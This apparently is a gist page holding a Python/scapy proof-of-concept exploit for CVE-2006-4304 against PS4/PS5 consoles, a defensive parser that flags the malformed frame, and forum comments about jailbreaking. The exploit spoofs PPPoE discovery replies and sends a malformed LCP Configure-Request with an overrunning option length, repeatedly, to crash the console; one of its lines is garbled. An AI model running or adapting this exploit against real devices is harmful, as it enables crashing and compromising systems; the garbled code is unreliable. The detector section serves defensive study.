Created
January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
```python
from scapy.all import Ether, PPPoED, Raw, get_if_hwaddr, hexdump, mac2str, sendp, sniff, srp1

interface = "Realtek PCIe 2.5GbE Family Controller #2"  # get via "ipconfig /all", or eth0 or similar on Linux

# Wait for the console's PADI (PPPoE discovery) and take both MAC addresses from it:
# the PS4's LAN MAC is the Ethernet source, ours is the adapter's own address.
padi = sniff(iface=interface, filter="pppoed", count=1)[0]
destination = mac2str(padi[Ether].src)      # MAC address of the LAN port on your PS4
source = mac2str(get_if_hwaddr(interface))  # MAC address of your adapter on the PC
# The console's Host-Uniq tag (second tag of its PADI, 8 bytes) must be echoed back in PADO and PADS.
tag_value = padi[PPPoED].tag_list[1].tag_value

# PADO: EtherType 0x8863, ver/type 0x11, code 0x07, session 0, length 12, one tag 0x0103 of length 8
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(Raw(payload), iface=interface)
sniff(iface=interface, filter="pppoed", count=1)  # PADR from the console
# PADS: code 0x65, assign session id 1
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(Raw(payload), iface=interface)
sniff(iface=interface, filter="pppoes", count=1)  # first PPP session packet (LCP) from the console

# PPPoE session (0x8864), session 1, length 9, PPP protocol 0xc021 (LCP), Configure-Request id 1,
# LCP length 7, carrying one option (type 0xab) whose length byte 0xff is larger than the data present
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"[:0] + destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface, timeout=5)  # returns None if the console does not answer
if packet is not None:
    hexdump(packet)

# Same frame padded with 0xff bytes; this number might be different, just a guess
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256
for i in range(20):
    sendp(Raw(payload), iface=interface)
```
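As an added example (not part of the gist), a dependency-free parser that walks the Ethernet, PPPoE session, PPP and LCP headers of a frame and reports the length inconsistency the PoC relies on: an LCP option whose length byte claims more bytes than the packet actually carries. The MAC addresses and the well-formed MRU Configure-Request are constructed sample inputs; the two malformed frames are the bytes the script above sends, with and without the 256-byte padding.

```python
import struct

ETHERTYPE_PPPOE_SESSION = 0x8864
PPP_PROTO_LCP = 0xC021
LCP_CONFIGURE_REQUEST = 1


def parse_lcp_frame(frame: bytes) -> dict:
    """Parse Ethernet/PPPoE-session/PPP/LCP and walk the LCP options.

    Returns the session id, LCP code/id, the options that parsed cleanly and a
    list of 'problems': every place where a length field claims more bytes
    than are present. A receiver that trusts those fields blindly reads past
    the data it was given.
    """
    problems = []
    if len(frame) < 14 + 6 + 2 + 4:
        raise ValueError("frame too short for Ethernet/PPPoE/PPP/LCP headers")
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_PPPOE_SESSION:
        raise ValueError(f"not a PPPoE session frame: ethertype 0x{ethertype:04x}")
    vertype, code, session, pppoe_len = struct.unpack("!BBHH", frame[14:20])
    if vertype != 0x11 or code != 0:
        raise ValueError("unexpected PPPoE ver/type/code")
    pppoe_payload = frame[20:]
    if pppoe_len > len(pppoe_payload):
        problems.append(f"PPPoE length {pppoe_len} exceeds {len(pppoe_payload)} bytes present")
    proto = struct.unpack("!H", pppoe_payload[:2])[0]
    if proto != PPP_PROTO_LCP:
        raise ValueError(f"not LCP: PPP protocol 0x{proto:04x}")
    lcp = pppoe_payload[2:]
    lcp_code, lcp_id, lcp_len = struct.unpack("!BBH", lcp[:4])
    if lcp_len > len(lcp):
        problems.append(f"LCP length {lcp_len} exceeds {len(lcp)} bytes present")
    options = []
    # Only the bytes that are both inside the declared LCP length and actually present.
    body = lcp[4:min(lcp_len, len(lcp))]
    off = 0
    while off < len(body):
        opt_type = body[off]
        if off + 1 >= len(body):
            problems.append(f"option 0x{opt_type:02x} truncated: no length byte")
            break
        opt_len = body[off + 1]
        if opt_len < 2:
            problems.append(f"option 0x{opt_type:02x} has length {opt_len} < 2")
            break
        if off + opt_len > len(body):
            problems.append(f"option 0x{opt_type:02x} length {opt_len} overruns the {len(body) - off} bytes left")
            break
        options.append((opt_type, body[off + 2:off + opt_len]))
        off += opt_len
    return {"session": session, "code": lcp_code, "id": lcp_id, "options": options, "problems": problems}


def is_overrun_trigger(frame: bytes) -> bool:
    """True for an LCP Configure-Request whose option length overruns the data present."""
    info = parse_lcp_frame(frame)
    return info["code"] == LCP_CONFIGURE_REQUEST and any("overruns" in p for p in info["problems"])


# Constructed placeholder MAC addresses (not real devices).
DST = bytes.fromhex("001122334455")
SRC = bytes.fromhex("66778899aabb")

# Constructed well-formed Configure-Request: one MRU option (type 1, len 4, value 1492),
# so LCP length 8 and PPPoE length 10.
GOOD_FRAME = DST + SRC + b"\x88\x64\x11\x00\x00\x01\x00\x0a\xc0\x21\x01\x01\x00\x08\x01\x04\x05\xd4"
# The frame the PoC sends: LCP length 7, option 0xab with length byte 0xff and no option data.
BAD_FRAME = DST + SRC + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
PADDED_FRAME = BAD_FRAME + b"\xff" * 256

if __name__ == "__main__":
    for name, frame in (("good", GOOD_FRAME), ("bad", BAD_FRAME), ("padded", PADDED_FRAME)):
        info = parse_lcp_frame(frame)
        print(name, "trigger" if is_overrun_trigger(frame) else "clean", info["problems"])
```

The padded variant is reported too: the extra bytes make the PPPoE and LCP length fields consistent again, but the option still claims 255 bytes while only three sit inside the declared LCP length, which is the field a receiver has to check before copying option data.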
I actually don't know, but if it is .02 it's a small change, so I don't think it is the error patch. I'm not truly sure, though, so the best thing you guys can do is test this script: if it crashes your console, the future exploit should work too.
Sorry that I didn't know more about jailbreaking stuff. In the past I used 9.00 on my PS4 Slim, and after a long, long time I got one more chance to use a jailbreak, and hopefully TheFlow says 8.20, which includes all the versions.